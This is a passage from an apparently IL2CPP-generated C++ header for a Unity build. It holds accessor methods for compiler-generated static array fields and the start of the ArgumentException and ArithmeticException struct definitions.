__StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F * get_address_of_CE5835130F5277F63D716FC9115526B0AC68FFAD_107() { return &___CE5835130F5277F63D716FC9115526B0AC68FFAD_107; } inline void set_CE5835130F5277F63D716FC9115526B0AC68FFAD_107(__StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F value) { ___CE5835130F5277F63D716FC9115526B0AC68FFAD_107 = value; } inline static int32_t get_offset_of_CE93C35B755802BC4B3D180716B048FC61701EF7_108() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___CE93C35B755802BC4B3D180716B048FC61701EF7_108)); } inline __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 get_CE93C35B755802BC4B3D180716B048FC61701EF7_108() const { return ___CE93C35B755802BC4B3D180716B048FC61701EF7_108; } inline __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 * get_address_of_CE93C35B755802BC4B3D180716B048FC61701EF7_108() { return &___CE93C35B755802BC4B3D180716B048FC61701EF7_108; } inline void set_CE93C35B755802BC4B3D180716B048FC61701EF7_108(__StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 value) { ___CE93C35B755802BC4B3D180716B048FC61701EF7_108 = value; } inline static int32_t get_offset_of_CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109)); } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 get_CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109() const { return ___CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109; } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 * get_address_of_CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109() { return &___CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109; } inline void set_CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109(__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 value) { ___CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109 = value; } inline static int32_t get_offset_of_D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110)); } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F get_D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110() const { return ___D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110; } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F * get_address_of_D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110() { return &___D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110; } inline void set_D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110(__StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F value) { ___D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110 = value; } inline static int32_t get_offset_of_D117188BE8D4609C0D531C51B0BB911A4219DEBE_111() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___D117188BE8D4609C0D531C51B0BB911A4219DEBE_111)); } inline __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 get_D117188BE8D4609C0D531C51B0BB911A4219DEBE_111() const { return ___D117188BE8D4609C0D531C51B0BB911A4219DEBE_111; } inline __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 * get_address_of_D117188BE8D4609C0D531C51B0BB911A4219DEBE_111() { return &___D117188BE8D4609C0D531C51B0BB911A4219DEBE_111; } inline void set_D117188BE8D4609C0D531C51B0BB911A4219DEBE_111(__StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 value) { ___D117188BE8D4609C0D531C51B0BB911A4219DEBE_111 = value; } inline static int32_t get_offset_of_D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112)); } inline __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 get_D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112() const { return ___D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112; } inline __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 * get_address_of_D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112() { return &___D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112; } inline void set_D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112(__StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 value) { ___D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112 = value; } inline static int32_t get_offset_of_D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113)); } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F get_D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113() const { return ___D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113; } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F * get_address_of_D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113() { return &___D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113; } inline void set_D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113(__StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F value) { ___D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113 = value; } inline static int32_t get_offset_of_D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114)); } inline __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F get_D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114() const { return ___D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114; } inline __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F * get_address_of_D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114() { return &___D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114; } inline void set_D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114(__StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F value) { ___D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114 = value; } inline static int32_t get_offset_of_DA19DB47B583EFCF7825D2E39D661D2354F28219_115() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___DA19DB47B583EFCF7825D2E39D661D2354F28219_115)); } inline __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB get_DA19DB47B583EFCF7825D2E39D661D2354F28219_115() const { return ___DA19DB47B583EFCF7825D2E39D661D2354F28219_115; } inline __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB * get_address_of_DA19DB47B583EFCF7825D2E39D661D2354F28219_115() { return &___DA19DB47B583EFCF7825D2E39D661D2354F28219_115; } inline void set_DA19DB47B583EFCF7825D2E39D661D2354F28219_115(__StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB value) { ___DA19DB47B583EFCF7825D2E39D661D2354F28219_115 = value; } inline static int32_t get_offset_of_DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116)); } inline __StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10 get_DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116() const { return ___DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116; } inline __StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10 * get_address_of_DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116() { return &___DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116; } inline void set_DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116(__StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10 value) { ___DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116 = value; } inline static int32_t get_offset_of_DD3AEFEADB1CD615F3017763F1568179FEE640B0_117() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___DD3AEFEADB1CD615F3017763F1568179FEE640B0_117)); } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A get_DD3AEFEADB1CD615F3017763F1568179FEE640B0_117() const { return ___DD3AEFEADB1CD615F3017763F1568179FEE640B0_117; } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A * get_address_of_DD3AEFEADB1CD615F3017763F1568179FEE640B0_117() { return &___DD3AEFEADB1CD615F3017763F1568179FEE640B0_117; } inline void set_DD3AEFEADB1CD615F3017763F1568179FEE640B0_117(__StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A value) { ___DD3AEFEADB1CD615F3017763F1568179FEE640B0_117 = value; } inline static int32_t get_offset_of_E1827270A5FE1C85F5352A66FD87BA747213D006_118() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___E1827270A5FE1C85F5352A66FD87BA747213D006_118)); } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 get_E1827270A5FE1C85F5352A66FD87BA747213D006_118() const { return ___E1827270A5FE1C85F5352A66FD87BA747213D006_118; } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 * get_address_of_E1827270A5FE1C85F5352A66FD87BA747213D006_118() { return &___E1827270A5FE1C85F5352A66FD87BA747213D006_118; } inline void set_E1827270A5FE1C85F5352A66FD87BA747213D006_118(__StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 value) { ___E1827270A5FE1C85F5352A66FD87BA747213D006_118 = value; } inline static int32_t get_offset_of_E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119() const { return ___E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119() { return &___E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119; } inline void set_E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119 = value; } inline static int32_t get_offset_of_E75835D001C843F156FBA01B001DFE1B8029AC17_120() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___E75835D001C843F156FBA01B001DFE1B8029AC17_120)); } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 get_E75835D001C843F156FBA01B001DFE1B8029AC17_120() const { return ___E75835D001C843F156FBA01B001DFE1B8029AC17_120; } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 * get_address_of_E75835D001C843F156FBA01B001DFE1B8029AC17_120() { return &___E75835D001C843F156FBA01B001DFE1B8029AC17_120; } inline void set_E75835D001C843F156FBA01B001DFE1B8029AC17_120(__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 value) { ___E75835D001C843F156FBA01B001DFE1B8029AC17_120 = value; } inline static int32_t get_offset_of_E92B39D8233061927D9ACDE54665E68E7535635A_121() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___E92B39D8233061927D9ACDE54665E68E7535635A_121)); } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A get_E92B39D8233061927D9ACDE54665E68E7535635A_121() const { return ___E92B39D8233061927D9ACDE54665E68E7535635A_121; } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A * get_address_of_E92B39D8233061927D9ACDE54665E68E7535635A_121() { return &___E92B39D8233061927D9ACDE54665E68E7535635A_121; } inline void set_E92B39D8233061927D9ACDE54665E68E7535635A_121(__StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A value) { ___E92B39D8233061927D9ACDE54665E68E7535635A_121 = value; } inline static int32_t get_offset_of_EA9506959484C55CFE0C139C624DF6060E285866_122() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EA9506959484C55CFE0C139C624DF6060E285866_122)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_EA9506959484C55CFE0C139C624DF6060E285866_122() const { return ___EA9506959484C55CFE0C139C624DF6060E285866_122; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_EA9506959484C55CFE0C139C624DF6060E285866_122() { return &___EA9506959484C55CFE0C139C624DF6060E285866_122; } inline void set_EA9506959484C55CFE0C139C624DF6060E285866_122(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___EA9506959484C55CFE0C139C624DF6060E285866_122 = value; } inline static int32_t get_offset_of_EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123)); } inline __StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7 get_EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123() const { return ___EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123; } inline __StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7 * get_address_of_EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123() { return &___EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123; } inline void set_EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123(__StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7 value) { ___EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123 = value; } inline static int32_t get_offset_of_EBF68F411848D603D059DFDEA2321C5A5EA78044_124() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EBF68F411848D603D059DFDEA2321C5A5EA78044_124)); } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 get_EBF68F411848D603D059DFDEA2321C5A5EA78044_124() const { return ___EBF68F411848D603D059DFDEA2321C5A5EA78044_124; } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 * get_address_of_EBF68F411848D603D059DFDEA2321C5A5EA78044_124() { return &___EBF68F411848D603D059DFDEA2321C5A5EA78044_124; } inline void set_EBF68F411848D603D059DFDEA2321C5A5EA78044_124(__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 value) { ___EBF68F411848D603D059DFDEA2321C5A5EA78044_124 = value; } inline static int32_t get_offset_of_EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125)); } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C get_EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125() const { return ___EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125; } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C * get_address_of_EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125() { return &___EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125; } inline void set_EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125(__StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C value) { ___EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125 = value; } inline static int32_t get_offset_of_EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126() const { return ___EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126() { return &___EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126; } inline void set_EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126 = value; } inline static int32_t get_offset_of_EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127() const { return ___EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127() { return &___EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127; } inline void set_EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127 = value; } inline static int32_t get_offset_of_F06E829E62F3AFBC045D064E10A4F5DF7C969612_128() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F06E829E62F3AFBC045D064E10A4F5DF7C969612_128)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_F06E829E62F3AFBC045D064E10A4F5DF7C969612_128() const { return ___F06E829E62F3AFBC045D064E10A4F5DF7C969612_128; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_F06E829E62F3AFBC045D064E10A4F5DF7C969612_128() { return &___F06E829E62F3AFBC045D064E10A4F5DF7C969612_128; } inline void set_F06E829E62F3AFBC045D064E10A4F5DF7C969612_128(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___F06E829E62F3AFBC045D064E10A4F5DF7C969612_128 = value; } inline static int32_t get_offset_of_F073AA332018FDA0D572E99448FFF1D6422BD520_129() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F073AA332018FDA0D572E99448FFF1D6422BD520_129)); } inline __StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5 get_F073AA332018FDA0D572E99448FFF1D6422BD520_129() const { return ___F073AA332018FDA0D572E99448FFF1D6422BD520_129; } inline __StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5 * get_address_of_F073AA332018FDA0D572E99448FFF1D6422BD520_129() { return &___F073AA332018FDA0D572E99448FFF1D6422BD520_129; } inline void set_F073AA332018FDA0D572E99448FFF1D6422BD520_129(__StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5 value) { ___F073AA332018FDA0D572E99448FFF1D6422BD520_129 = value; } inline static int32_t get_offset_of_F34B0E10653402E8F788F8BC3F7CD7090928A429_130() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F34B0E10653402E8F788F8BC3F7CD7090928A429_130)); } inline __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 get_F34B0E10653402E8F788F8BC3F7CD7090928A429_130() const { return ___F34B0E10653402E8F788F8BC3F7CD7090928A429_130; } inline __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 * get_address_of_F34B0E10653402E8F788F8BC3F7CD7090928A429_130() { return &___F34B0E10653402E8F788F8BC3F7CD7090928A429_130; } inline void set_F34B0E10653402E8F788F8BC3F7CD7090928A429_130(__StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 value) { ___F34B0E10653402E8F788F8BC3F7CD7090928A429_130 = value; } inline static int32_t get_offset_of_F37E34BEADB04F34FCC31078A59F49856CA83D5B_131() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F37E34BEADB04F34FCC31078A59F49856CA83D5B_131)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_F37E34BEADB04F34FCC31078A59F49856CA83D5B_131() const { return ___F37E34BEADB04F34FCC31078A59F49856CA83D5B_131; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_F37E34BEADB04F34FCC31078A59F49856CA83D5B_131() { return &___F37E34BEADB04F34FCC31078A59F49856CA83D5B_131; } inline void set_F37E34BEADB04F34FCC31078A59F49856CA83D5B_131(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___F37E34BEADB04F34FCC31078A59F49856CA83D5B_131 = value; } inline static int32_t get_offset_of_F512A9ABF88066AAEB92684F95CC05D8101B462B_132() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F512A9ABF88066AAEB92684F95CC05D8101B462B_132)); } inline __StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6 get_F512A9ABF88066AAEB92684F95CC05D8101B462B_132() const { return ___F512A9ABF88066AAEB92684F95CC05D8101B462B_132; } inline __StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6 * get_address_of_F512A9ABF88066AAEB92684F95CC05D8101B462B_132() { return &___F512A9ABF88066AAEB92684F95CC05D8101B462B_132; } inline void set_F512A9ABF88066AAEB92684F95CC05D8101B462B_132(__StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6 value) { ___F512A9ABF88066AAEB92684F95CC05D8101B462B_132 = value; } inline static int32_t get_offset_of_F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133() const { return ___F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133() { return &___F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133; } inline void set_F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133 = value; } inline static int32_t get_offset_of_FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134)); } inline __StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D get_FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134() const { return ___FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134; } inline __StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D * get_address_of_FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134() { return &___FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134; } inline void set_FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134(__StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D value) { ___FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // U3CPRIVATEIMPLEMENTATIONDETAILSU3E_T5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_H #ifndef ARGUMENTEXCEPTION_TEDCD16F20A09ECE461C3DA766C16EDA8864057D1_H #define ARGUMENTEXCEPTION_TEDCD16F20A09ECE461C3DA766C16EDA8864057D1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ArgumentException struct ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: // System.String System.ArgumentException::m_paramName String_t* ___m_paramName_17; public: inline static int32_t get_offset_of_m_paramName_17() { return static_cast<int32_t>(offsetof(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1, ___m_paramName_17)); } inline String_t* get_m_paramName_17() const { return ___m_paramName_17; } inline String_t** get_address_of_m_paramName_17() { return &___m_paramName_17; } inline void set_m_paramName_17(String_t* value) { ___m_paramName_17 = value; Il2CppCodeGenWriteBarrier((&___m_paramName_17), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ARGUMENTEXCEPTION_TEDCD16F20A09ECE461C3DA766C16EDA8864057D1_H #ifndef ARITHMETICEXCEPTION_TF9EF5FE94597830EF315C5934258F994B8648269_H #define ARITHMETICEXCEPTION_TF9EF5FE94597830EF315C5934258F994B8648269_H #ifdef __clang__ 